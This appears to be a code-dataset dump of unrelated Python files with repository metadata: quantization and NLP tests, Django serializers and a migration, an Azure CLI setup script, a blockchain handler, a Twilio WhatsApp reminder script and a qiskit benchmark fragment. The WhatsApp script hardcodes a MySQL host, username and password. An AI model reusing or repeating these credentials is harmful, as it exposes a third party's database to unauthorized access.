        else:
            # Fix: was ``raise NotImplemented`` — NotImplemented is a sentinel
            # value, not an exception class, so that raised a TypeError.
            raise NotImplementedError

    def get_fw_info(self) -> FrameworkInfo:
        """Framework info describing PyTorch ops and their attributes."""
        return DEFAULT_PYTORCH_INFO

    def get_fw_impl(self) -> FrameworkImplementation:
        """Framework implementation MCT uses for PyTorch."""
        return PytorchImplementation()

    def get_ptq_facade(self):
        """Entry point used to quantize the networks under test."""
        return pytorch_post_training_quantization

    def generate_inputs(self):
        """Random torch inputs matching the configured input shapes."""
        return to_torch_tensor([torch.randn(*in_shape) for in_shape in self.get_input_shapes()])

    def create_networks(self):
        """One wrapper model per tested layer (two-input ops get OperationTestModel)."""
        models = []
        for layer in self.get_layers():
            if self.num_of_inputs > 1:
                models.append(OperationTestModel(layer))
            else:
                models.append(LayerTestModel(layer))
        return models

    def compare(self, quantized_model: Module, float_model: Module, input_x=None, quantization_info=None):
        """Dispatch to the mode-specific checks, then smoke-test inference."""
        quantized_model_fx = symbolic_trace(quantized_model)
        if self.current_mode == LayerTestMode.FLOAT:
            self.__compare_float_mode(float_model, quantized_model, quantized_model_fx)
        elif self.current_mode == LayerTestMode.QUANTIZED_8_BITS:
            self.__compare_8bits_quantization_mode(float_model, quantized_model, quantized_model_fx)
        # Whatever the mode, inference must still run on both models.
        input_tensors = self.generate_inputs()
        quantized_model(*input_tensors)
        quantized_model_fx(*input_tensors)

    def __compare_8bits_quantization_mode(self, float_model, quantized_model, quantized_model_fx):
        """Verify fake-quant placement per PYTORCH_LAYER_TEST_OPS in 8-bit mode."""
        fw_info = self.get_fw_info()
        for node in quantized_model_fx.graph.nodes:
            op = get_node_operation(node, quantized_model)
            # Skip the output node, getitem glue nodes and fake-quant nodes.
            if op == OUTPUT or op == operator.getitem or is_node_fake_quant(node):
                continue
            if hasattr(quantized_model, str(node.target)):
                if type(op) in PYTORCH_LAYER_TEST_OPS['kernel_ops']:
                    # Quantized kernel attributes must differ from the float ones.
                    quantized_weights = get_layer_weights(getattr(quantized_model, node.target))
                    float_weights = get_layer_weights(getattr(float_model, node.target))
                    for k, v in quantized_weights.items():
                        if k in fw_info.kernel_ops_attributes_mapping.get(type(op)):
                            float_weight = float_weights.get(k)
                            self.unit_test.assertFalse(float_weight is None)
                            self.unit_test.assertTrue(np.sum(np.abs(v - float_weight)) > 0.0)
                    # The next non-getitem node must be a fake-quant node.
                    node_next = node.next
                    while get_node_operation(node_next, quantized_model) == operator.getitem:
                        node_next = node_next.next
                    self.unit_test.assertTrue(is_node_fake_quant(node_next))
            elif op in PYTORCH_LAYER_TEST_OPS['activation']:
                node_next = node.next
                while get_node_operation(node_next, quantized_model) == operator.getitem:
                    node_next = node_next.next
                self.unit_test.assertTrue(is_node_fake_quant(node_next))
            elif op in PYTORCH_LAYER_TEST_OPS['no_quantization']:
                node_next = node.next
                while get_node_operation(node_next, quantized_model) == operator.getitem:
                    node_next = node_next.next
                self.unit_test.assertFalse(is_node_fake_quant(node_next))
            else:
                raise Exception(f'Layer {op} is not in framework info')

    def __compare_float_mode(self, float_model, quantized_model, quantized_model_fx):
        """Verify the float-mode model is untouched and matches the original."""
        for node in quantized_model_fx.graph.nodes:
            # No fake-quant nodes may appear in float mode.
            self.unit_test.assertFalse(is_node_fake_quant(node))
            # Weights must be bit-exact vs. the float model.
            # NOTE(review): the guard uses node.target but the lookups use
            # node.name — presumably identical for call_module nodes; confirm.
            if hasattr(quantized_model, str(node.target)):
                quantized_weights = get_layer_weights(getattr(quantized_model, node.name))
                float_weights = get_layer_weights(getattr(float_model, node.name))
                for k, v in quantized_weights.items():
                    float_weight = float_weights.get(k)
                    self.unit_test.assertFalse(float_weight is None)
                    self.unit_test.assertTrue(np.sum(np.abs(v - float_weight)) == 0.0)
        input_tensors = self.generate_inputs()
        y = float_model(*input_tensors)
        y_hat = quantized_model(*input_tensors)
        if isinstance(y, (list, tuple)):
            for fo, qo in zip(y, y_hat):
                distance = torch_tensor_to_numpy(torch.sum(torch.abs(fo - qo)))
                self.unit_test.assertTrue(distance == 0,
                                          msg=f'Outputs should be identical. Observed distance: {distance}')
        else:
            distance = torch_tensor_to_numpy(torch.sum(torch.abs(y - y_hat)))
            self.unit_test.assertTrue(distance == 0,
                                      msg=f'Outputs should be identical. Observed distance: {distance}')
| true | true |
f722ef5194b3bd55287cc22de9904dd969534850 | 1,056 | py | Python | zoo_app/serializers.py | sh4rpy/zoo_api | 77c2788141fb6f25f8e5d1de7137653a153d7c3d | [
"BSD-3-Clause"
] | null | null | null | zoo_app/serializers.py | sh4rpy/zoo_api | 77c2788141fb6f25f8e5d1de7137653a153d7c3d | [
"BSD-3-Clause"
] | null | null | null | zoo_app/serializers.py | sh4rpy/zoo_api | 77c2788141fb6f25f8e5d1de7137653a153d7c3d | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import serializers
from .models import Employee, ZooPlace, AnimalType, Animal
class EmployeeSerializer(serializers.ModelSerializer):
    """Serializes every field of the Employee model."""
    class Meta:
        model = Employee
        fields = '__all__'
class ZooPlaceSerializer(serializers.ModelSerializer):
    """Serializes every ZooPlace field plus a read-only animal count."""
    # Count of related animals via the place's ``animals`` relation —
    # presumably the reverse FK from Animal; confirm in models.py.
    animal_count = serializers.ReadOnlyField(source='animals.count')
    class Meta:
        model = ZooPlace
        fields = '__all__'
class AnimalTypeSerializer(serializers.ModelSerializer):
    """Serializes every field of the AnimalType model."""
    class Meta:
        model = AnimalType
        fields = '__all__'
class AnimalSerializer(serializers.ModelSerializer):
    """Serializes Animal with human-readable related fields."""
    # Related type/place are exposed by their ``name`` instead of their pk.
    # The field name ``type`` shadows the builtin, but renaming it would
    # change the API payload.
    type = serializers.SlugRelatedField(slug_field='name', queryset=AnimalType.objects.all())
    place = serializers.SlugRelatedField(slug_field='name', queryset=ZooPlace.objects.all())
    # For readability, expose the full name of the assigned (responsible) employee.
    responsible_employee_full_name = serializers.ReadOnlyField(source='responsible_employee.get_employee_full_name')
    class Meta:
        model = Animal
        fields = '__all__'
| 30.171429 | 116 | 0.744318 | from rest_framework import serializers
from .models import Employee, ZooPlace, AnimalType, Animal
class EmployeeSerializer(serializers.ModelSerializer):
    """Serializes every field of the Employee model."""
    class Meta:
        model = Employee
        fields = '__all__'
class ZooPlaceSerializer(serializers.ModelSerializer):
    """Serializes every ZooPlace field plus a read-only animal count."""
    # Count of related animals via the place's ``animals`` relation —
    # presumably the reverse FK from Animal; confirm in models.py.
    animal_count = serializers.ReadOnlyField(source='animals.count')
    class Meta:
        model = ZooPlace
        fields = '__all__'
class AnimalTypeSerializer(serializers.ModelSerializer):
    """Serializes every field of the AnimalType model."""
    class Meta:
        model = AnimalType
        fields = '__all__'
class AnimalSerializer(serializers.ModelSerializer):
    """Serializes Animal with human-readable related fields."""
    # Related type/place are exposed by their ``name`` instead of their pk.
    # The field name ``type`` shadows the builtin, but renaming it would
    # change the API payload.
    type = serializers.SlugRelatedField(slug_field='name', queryset=AnimalType.objects.all())
    place = serializers.SlugRelatedField(slug_field='name', queryset=ZooPlace.objects.all())
    # For readability, expose the full name of the assigned (responsible) employee.
    responsible_employee_full_name = serializers.ReadOnlyField(source='responsible_employee.get_employee_full_name')
    class Meta:
        model = Animal
        fields = '__all__'
| true | true |
f722f040f81bc0fb6a9bae04a6e256d003b49696 | 1,509 | py | Python | test/python/testpipeline/testentity.py | malywonsz/txtai | ace1b04161062430887eb2153961abcd819a5afb | [
"Apache-2.0"
] | 1 | 2020-09-18T14:11:34.000Z | 2020-09-18T14:11:34.000Z | test/python/testpipeline/testentity.py | aria1991/txtai | fa342a4f6a69fb1e2cea0e85e39915f055ee8503 | [
"Apache-2.0"
] | 47 | 2021-10-02T22:48:03.000Z | 2021-12-29T02:36:20.000Z | test/python/testpipeline/testentity.py | aria1991/txtai | fa342a4f6a69fb1e2cea0e85e39915f055ee8503 | [
"Apache-2.0"
] | null | null | null | """
Entity module tests
"""
import unittest
from txtai.pipeline import Entity
class TestEntity(unittest.TestCase):
    """
    Entity pipeline (named-entity recognition) tests.
    """
    @classmethod
    def setUpClass(cls):
        """
        Create a single shared Entity pipeline for all tests.
        NOTE: loads the "dslim/bert-base-NER" model — needs network access
        or a warm local model cache on first run.
        """
        cls.entity = Entity("dslim/bert-base-NER")
    def testEntity(self):
        """
        Default extraction: results are tuples whose first element is the
        entity text.
        """
        # Run entity extraction
        entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg")
        self.assertEqual([e[0] for e in entities], ["Canada", "Manhattan"])
    def testEntityFlatten(self):
        """
        flatten=True returns plain entity strings; join=True additionally
        joins them into a single space-separated string.
        """
        # Test flatten
        entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", flatten=True)
        self.assertEqual(entities, ["Canada", "Manhattan"])
        # Test flatten with join
        entities = self.entity(
            "Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", flatten=True, join=True
        )
        self.assertEqual(entities, "Canada Manhattan")
    def testEntityTypes(self):
        """
        labels filtering: only the requested entity types are returned —
        "PER" matches nothing in this sentence.
        """
        # Run entity extraction
        entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", labels=["PER"])
        self.assertFalse(entities)
| 27.436364 | 144 | 0.626243 |
import unittest
from txtai.pipeline import Entity
class TestEntity(unittest.TestCase):
    """
    Entity pipeline (named-entity recognition) tests.
    """
    @classmethod
    def setUpClass(cls):
        """
        Create a single shared Entity pipeline for all tests.
        NOTE: loads the "dslim/bert-base-NER" model — needs network access
        or a warm local model cache on first run.
        """
        cls.entity = Entity("dslim/bert-base-NER")
    def testEntity(self):
        """
        Default extraction: results are tuples whose first element is the
        entity text.
        """
        entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg")
        self.assertEqual([e[0] for e in entities], ["Canada", "Manhattan"])
    def testEntityFlatten(self):
        """
        flatten=True returns plain entity strings; join=True additionally
        joins them into a single space-separated string.
        """
        # Test flatten
        entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", flatten=True)
        self.assertEqual(entities, ["Canada", "Manhattan"])
        # Test flatten with join
        entities = self.entity(
            "Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", flatten=True, join=True
        )
        self.assertEqual(entities, "Canada Manhattan")
    def testEntityTypes(self):
        """
        labels filtering: only the requested entity types are returned —
        "PER" matches nothing in this sentence.
        """
        # Run entity extraction
        entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", labels=["PER"])
        self.assertFalse(entities)
| true | true |
f722f0934122b5e398fdeb44779b23cdbd091cd8 | 564 | py | Python | steps/migrations/0006_auto_20170827_2213.py | arusyonok/speakup | 8094ce1d6c7e122ec0de82b3a4daeda7ac2a4f41 | [
"Apache-2.0"
] | null | null | null | steps/migrations/0006_auto_20170827_2213.py | arusyonok/speakup | 8094ce1d6c7e122ec0de82b3a4daeda7ac2a4f41 | [
"Apache-2.0"
] | null | null | null | steps/migrations/0006_auto_20170827_2213.py | arusyonok/speakup | 8094ce1d6c7e122ec0de82b3a4daeda7ac2a4f41 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-27 19:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: alter ``exercise.question_id`` to a nullable/blank FK."""
    dependencies = [
        ('steps', '0005_auto_20170827_1925'),
    ]
    operations = [
        migrations.AlterField(
            model_name='exercise',
            name='question_id',
            # Nullable/blank FK to steps.Question; question deletion cascades.
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='steps.Question'),
        ),
    ]
| 25.636364 | 125 | 0.656028 |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: alter ``exercise.question_id`` to a nullable/blank FK."""
    dependencies = [
        ('steps', '0005_auto_20170827_1925'),
    ]
    operations = [
        migrations.AlterField(
            model_name='exercise',
            name='question_id',
            # Nullable/blank FK to steps.Question; question deletion cascades.
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='steps.Question'),
        ),
    ]
| true | true |
f722f0fc36b243187aa8d44062fc7d80514e6c8e | 1,892 | py | Python | src/command_modules/azure-cli-keyvault/setup.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-keyvault/setup.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-keyvault/setup.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from codecs import open
from setuptools import setup
# Package version; the '+dev' local suffix marks an in-development build.
VERSION = '0.1.1b3+dev'
# The full list of classifiers is available at
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = [
    'Development Status :: 4 - Beta',
    'Intended Audience :: Developers',
    'Intended Audience :: System Administrators',
    'Programming Language :: Python',
    'Programming Language :: Python :: 2',
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3',
    'Programming Language :: Python :: 3.4',
    'Programming Language :: Python :: 3.5',
    'Programming Language :: Python :: 3.6',
    'License :: OSI Approved :: MIT License',
]
# Runtime dependencies installed together with this command module.
DEPENDENCIES = [
    'azure-mgmt-keyvault==0.30.0',
    'azure-keyvault==0.1.0',
    'azure-cli-core',
    'pyOpenSSL'
]
# The long description published to PyPI is the README followed by the changelog.
with open('README.rst', 'r', encoding='utf-8') as f:
    README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
    HISTORY = f.read()
setup(
    name='azure-cli-keyvault',
    version=VERSION,
    description='Microsoft Azure Command-Line Tools Keyvault Command Module',
    long_description=README + '\n\n' + HISTORY,
    license='MIT',
    author='Microsoft Corporation',
    author_email='azpycli@microsoft.com',
    url='https://github.com/Azure/azure-cli',
    classifiers=CLASSIFIERS,
    namespace_packages=[
        'azure',
        'azure.cli',
        'azure.cli.command_modules'
    ],
    packages=[
        'azure.cli.command_modules.keyvault'
    ],
    install_requires=DEPENDENCIES,
)
| 30.516129 | 94 | 0.592495 |
from codecs import open
from setuptools import setup
VERSION = '0.1.1b3+dev'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
]
DEPENDENCIES = [
'azure-mgmt-keyvault==0.30.0',
'azure-keyvault==0.1.0',
'azure-cli-core',
'pyOpenSSL'
]
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azure-cli-keyvault',
version=VERSION,
description='Microsoft Azure Command-Line Tools Keyvault Command Module',
long_description=README + '\n\n' + HISTORY,
license='MIT',
author='Microsoft Corporation',
author_email='azpycli@microsoft.com',
url='https://github.com/Azure/azure-cli',
classifiers=CLASSIFIERS,
namespace_packages=[
'azure',
'azure.cli',
'azure.cli.command_modules'
],
packages=[
'azure.cli.command_modules.keyvault'
],
install_requires=DEPENDENCIES,
)
| true | true |
f722f183360b21031a113892752701feb5e37dee | 2,189 | py | Python | src/protocol/on_chain_info_request.py | hvuhsg/yoyocoin | aad0f413479728dc4e0842447cf1910e5dff1418 | [
"MIT"
] | 11 | 2021-05-25T07:42:27.000Z | 2022-01-03T07:46:38.000Z | src/protocol/on_chain_info_request.py | hvuhsg/yoyocoin | aad0f413479728dc4e0842447cf1910e5dff1418 | [
"MIT"
] | 18 | 2021-05-25T17:42:46.000Z | 2021-09-13T15:14:38.000Z | src/protocol/on_chain_info_request.py | hvuhsg/yoyocoin | aad0f413479728dc4e0842447cf1910e5dff1418 | [
"MIT"
] | 5 | 2021-06-23T17:38:51.000Z | 2022-03-03T12:40:53.000Z | """
Handle chain info request
if chain info request is initiated the handler will execute those steps:
1. validate message
2. get chain info and summery
3. publish chain info and get cid
4. send the cid and summery
"""
from typing import Tuple
from blockchain import Blockchain
from network.ipfs import Node, Message
from .handler import Handler
class ChainInfoRequestHandler(Handler):
    """Serve chain-info requests.

    On a valid request: collect the local chain info and summery, publish the
    info to IPFS, and respond with the resulting CID plus the summery.
    """

    topic = "chain-request"
    topic_response = "chain-response"

    def __init__(self):
        self.node = Node.get_instance()

    def validate(self, message: Message):
        """Accept the request only if the sender reports a lower chain score."""
        chain = Blockchain.get_main_chain()
        remote_score = message.meta.get("score", None)
        # TODO: check length
        return remote_score is not None and remote_score < chain.score

    def get_chain_info(self) -> Tuple[dict, dict]:
        """
        Return blockchain block hashes
        :return: tuple of chain info (block hashes) and chain summery (chain length and score)
        """
        chain = Blockchain.get_main_chain()
        info = {"blocks": chain.chain}
        summery = {"score": chain.score, "length": chain.length}
        return info, summery

    def publish_chain_info(self, chain_info: dict) -> str:
        """Publish per-block CIDs and hashes; return the CID of the index."""
        cids = []
        hashes = []
        for block in chain_info["blocks"]:
            cids.append(self.node.create_cid(block.to_dict()))
            hashes.append(block.hash())
        index = {"blocks_cid": cids, "blocks_hash": hashes}
        return self.node.create_cid(index)

    def send_cid_and_summery(self, cid: str, summery: dict):
        """Answer on the response topic with the index CID and chain summery."""
        reply = Message(cid=cid, meta=summery)
        return self.node.publish_to_topic(topic=self.topic_response, message=reply)

    def __call__(self, message: Message):
        super().log(message)
        if not self.validate(message):
            return
        info, summery = self.get_chain_info()
        self.send_cid_and_summery(self.publish_chain_info(info), summery)
| 33.676923 | 94 | 0.664687 | from typing import Tuple
from blockchain import Blockchain
from network.ipfs import Node, Message
from .handler import Handler
class ChainInfoRequestHandler(Handler):
topic = "chain-request"
topic_response = "chain-response"
def __init__(self):
self.node = Node.get_instance()
def validate(self, message: Message):
blockchain: Blockchain = Blockchain.get_main_chain()
score_exist = message.meta.get("score", None) is not None
score_is_lower = score_exist and message.meta.get("score") < blockchain.score
return score_is_lower
def get_chain_info(self) -> Tuple[dict, dict]:
blockchain: Blockchain = Blockchain.get_main_chain()
blocks = blockchain.chain
score = blockchain.score
length = blockchain.length
return {"blocks": blocks}, {"score": score, "length": length}
def publish_chain_info(self, chain_info: dict) -> str:
blocks_cids = []
blocks_hashes = []
for block in chain_info["blocks"]:
block_dict = block.to_dict()
blocks_cids.append(self.node.create_cid(block_dict))
blocks_hashes.append(block.hash())
return self.node.create_cid(
{"blocks_cid": blocks_cids, "blocks_hash": blocks_hashes}
)
def send_cid_and_summery(self, cid: str, summery: dict):
return self.node.publish_to_topic(
topic=self.topic_response, message=Message(cid=cid, meta=summery)
)
def __call__(self, message: Message):
super().log(message)
if not self.validate(message):
return
chain_info, chain_summery = self.get_chain_info()
cid = self.publish_chain_info(chain_info)
self.send_cid_and_summery(cid, chain_summery)
| true | true |
f722f1fd3b4d30624e6d89fa16d82222e5c6995c | 2,500 | py | Python | whatsapp_alex.py | Tycho-02/studentmotivator-inator | 6c50d79127cca1a88bf2f2df58a0f451f41abe9d | [
"MIT"
] | 1 | 2021-03-17T13:09:15.000Z | 2021-03-17T13:09:15.000Z | whatsapp_alex.py | Tycho-02/studentmotivator-inator | 6c50d79127cca1a88bf2f2df58a0f451f41abe9d | [
"MIT"
] | null | null | null | whatsapp_alex.py | Tycho-02/studentmotivator-inator | 6c50d79127cca1a88bf2f2df58a0f451f41abe9d | [
"MIT"
] | null | null | null | #ontwikkeld door S1118551
# Sends a WhatsApp message to the user when they wake up, listing the tasks
# scheduled for them today. If the user has no task for the day, they instead
# get a message saying they have been doing well over the past days.
# This is an integration with Tycho's subsystem!
import os
from twilio.rest import Client
import mysql.connector

mydb = mysql.connector.connect(
    host="vserver385.axc.nl",
    user="tychogp385_ipmedt5",
    passwd="ipmedt5",
    database="tychogp385_ipmedt5"
)

# Fetch the descriptions of today's unfinished tasks.
taken = []
mycursor = mydb.cursor()
sql_select_Query = "select title, omschrijving from taken where uitvoerdatum = curdate() and status = 'niet voltooid'"
mycursor.execute(sql_select_Query)
records = mycursor.fetchall()
for row in records:
    taken.append(row[1])
# Join the task descriptions for today into one string for the message body.
takenOpen = ',\n'.join(taken)

# Fetch the user's name and phone number.
gegevens = []
sql_select_Query1 = "select name, telefoonnummer from users where userId = 1"
mycursor.execute(sql_select_Query1)
records = mycursor.fetchall()
for user in records:
    gegevens.append(user[0])
    gegevens.append(user[1])
naam = gegevens[0]
# Prefix the Dutch country code to the stored phone number.
nummer = '+31' + str(gegevens[1])
print('taken')  # NOTE(review): prints the literal word 'taken'; was print(taken) intended?
print('naam is ' + naam)
print('nummer is ' + nummer)

# Twilio credentials are kept out of version control for security reasons.
account_sid = ''
auth_token = ''
client = Client(account_sid, auth_token)
# WARNING: because we use a Twilio sandbox, the user must first send the
# WhatsApp message 'join above-noon' to +14155238886 to be able to receive
# messages.
from_whatsapp_number = 'whatsapp:+14155238886'
to_whatsapp_number = 'whatsapp:' + nummer
# BUG FIX: the original `if(taken > 0)` compared a list to an int, which
# raises TypeError on Python 3; test for a non-empty task list instead.
if len(taken) > 0:  # the user has tasks scheduled for today
    client.messages.create(body='Beste ' + naam + ',\nvandaag heb je op planning de volgende taak/taken staan:\n' + takenOpen + '.\nVeel succes en zet hem op!', from_=from_whatsapp_number,to=to_whatsapp_number)
else:  # no open tasks: send an encouraging message instead
    client.messages.create(body='Beste ' + naam + ',\nvandaag heb je geen taak/taken open staan. Je bent goed bezig geweest de afgelopen dagen, ga zo door!', from_=from_whatsapp_number,to=to_whatsapp_number)
| 37.878788 | 210 | 0.7568 |
import os
from twilio.rest import Client
import mysql.connector
mydb = mysql.connector.connect(
host="vserver385.axc.nl",
user="tychogp385_ipmedt5",
passwd="ipmedt5",
database="tychogp385_ipmedt5"
)
taken = []
mycursor = mydb.cursor()
sql_select_Query = "select title, omschrijving from taken where uitvoerdatum = curdate() and status = 'niet voltooid'"
mycursor.execute(sql_select_Query)
records = mycursor.fetchall()
for row in records:
taken.append(row[1])
takenOpen = ',\n'.join(taken)
gegevens = []
sql_select_Query1 = "select name, telefoonnummer from users where userId = 1"
mycursor.execute(sql_select_Query1)
records = mycursor.fetchall()
for user in records:
gegevens.append(user[0])
gegevens.append(user[1])
naam = gegevens[0]
nummer = '+31' + str(gegevens[1])
print('taken')
print('naam is ' + naam)
print('nummer is ' + nummer)
account_sid = ''
auth_token = ''
client = Client(account_sid, auth_token)
sapp_number='whatsapp:+14155238886'
to_whatsapp_number = 'whatsapp:' + nummer
if(taken > 0):
client.messages.create(body='Beste ' + naam + ',\nvandaag heb je op planning de volgende taak/taken staan:\n' + takenOpen + '.\nVeel succes en zet hem op!', from_=from_whatsapp_number,to=to_whatsapp_number)
else:
client.messages.create(body='Beste ' + naam + ',\nvandaag heb je geen taak/taken open staan. Je bent goed bezig geweest de afgelopen dagen, ga zo door!', from_=from_whatsapp_number,to=to_whatsapp_number)
| true | true |
f722f3e0a4d7b7f162d149e2b77f4d6ca1bb7d1c | 347 | py | Python | pythonFiles/tests/run_all.py | alexvy86/vscode-python | de625369b59ff3928859cd6beec0cb296eab493c | [
"MIT"
] | null | null | null | pythonFiles/tests/run_all.py | alexvy86/vscode-python | de625369b59ff3928859cd6beec0cb296eab493c | [
"MIT"
] | null | null | null | pythonFiles/tests/run_all.py | alexvy86/vscode-python | de625369b59ff3928859cd6beec0cb296eab493c | [
"MIT"
] | null | null | null | import os.path
import sys
import pytest
# Directory containing this runner script (the tests root).
TEST_ROOT = os.path.dirname(__file__)
# Parent directory of the tests, passed to pytest as the root directory.
SRC_ROOT = os.path.dirname(TEST_ROOT)
# Location of the datascience helper scripts the tests import.
DATASCIENCE_ROOT = os.path.join(SRC_ROOT, 'datascience')
if __name__ == '__main__':
    # Make the datascience modules importable from the tests.
    sys.path.insert(1, DATASCIENCE_ROOT)
    ec = pytest.main([
        '--rootdir', SRC_ROOT,
        TEST_ROOT,
    ])
    # Propagate pytest's exit status to the caller.
    sys.exit(ec)
| 18.263158 | 56 | 0.665706 | import os.path
import sys
import pytest
TEST_ROOT = os.path.dirname(__file__)
SRC_ROOT = os.path.dirname(TEST_ROOT)
DATASCIENCE_ROOT = os.path.join(SRC_ROOT, 'datascience')
if __name__ == '__main__':
sys.path.insert(1, DATASCIENCE_ROOT)
ec = pytest.main([
'--rootdir', SRC_ROOT,
TEST_ROOT,
])
sys.exit(ec)
| true | true |
f722f45b5c1cb9a003331a5fca823ab307245999 | 456 | py | Python | data/scripts/templates/object/static/space/debris/shared_cargo_destroyed_large_a.py | obi-two/GameServer | 7d37024e2291a97d49522610cd8f1dbe5666afc2 | [
"MIT"
] | 20 | 2015-02-23T15:11:56.000Z | 2022-03-18T20:56:48.000Z | data/scripts/templates/object/static/space/debris/shared_cargo_destroyed_large_a.py | apathyboy/swganh | 665128efe9154611dec4cb5efc61d246dd095984 | [
"MIT"
] | null | null | null | data/scripts/templates/object/static/space/debris/shared_cargo_destroyed_large_a.py | apathyboy/swganh | 665128efe9154611dec4cb5efc61d246dd095984 | [
"MIT"
] | 20 | 2015-04-04T16:35:59.000Z | 2022-03-24T14:54:37.000Z | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
	"""Build the Static object template for this destroyed-cargo debris model."""
	result = Static()
	result.template = "object/static/space/debris/shared_cargo_destroyed_large_a.iff"
	result.attribute_template_id = -1
	result.stfName("obj_n","unknown_object")
	#### BEGIN MODIFICATIONS ####
	#### END MODIFICATIONS ####
return result | 26.823529 | 82 | 0.730263 | true | true | |
f722f6308a91977c4089757947509ab92b935a5f | 138 | py | Python | trace.py | jvicu2001/GGeoTrace | 7796daaa505586cf7b867e321aa528f5dd64a8c6 | [
"MIT"
] | null | null | null | trace.py | jvicu2001/GGeoTrace | 7796daaa505586cf7b867e321aa528f5dd64a8c6 | [
"MIT"
] | null | null | null | trace.py | jvicu2001/GGeoTrace | 7796daaa505586cf7b867e321aa528f5dd64a8c6 | [
"MIT"
] | null | null | null | import socket
"""
TODO
Custom implementation of traceroute
It will only return data needed for the rest of the program (ip and time)
""" | 17.25 | 73 | 0.76087 | import socket
| true | true |
f722f672f7f943a9cc28fff66f5c11bb56a0d78c | 4,146 | py | Python | benchmark/startQiskit_Class2285.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_Class2285.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_Class2285.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=4
# total number=39
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
    """XOR two equal-length bit strings position-wise; the result is reversed."""
    xored = [str(int(s[i]) ^ int(t[i])) for i in range(len(s))]
    return ''.join(reversed(xored))
def bitwise_dot(s: str, t: str) -> str:
    """Dot product of two bit strings modulo 2, returned as '0' or '1'."""
    total = sum(int(s[i]) * int(t[i]) for i in range(len(s)))
    return str(total % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
    """Build an oracle circuit that flips the target qubit for every n-bit
    input string rep with f(rep) == "1".

    For each such basis state, X gates map |rep> onto |1...1> on the control
    register, a multi-controlled Toffoli flips the target, and the X gates
    are applied again to uncompute.
    """
    # implement the oracle O_f
    # NOTE: use multi_control_toffoli_gate ('noancilla' mode)
    # https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
    # https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
    # https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
    controls = QuantumRegister(n, "ofc")
    target = QuantumRegister(1, "oft")
    oracle = QuantumCircuit(controls, target, name="Of")
    for i in range(2 ** n):
        rep = np.binary_repr(i, n)
        if f(rep) == "1":
            # Select this basis state: flip the controls where rep has a '0'.
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
            oracle.mct(controls, target[0], None, mode='noancilla')
            # Undo the selection so the control register is restored.
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
    # oracle.barrier()
    return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Assemble the auto-generated n-qubit benchmark circuit.

    A fixed gate sequence (the `# number=` tags index the generated gates)
    surrounds the oracle for f, which is applied across all n qubits.
    The exact gate order is part of the benchmark; do not reorder.
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    prog.h(input_qubit[3]) # number=36
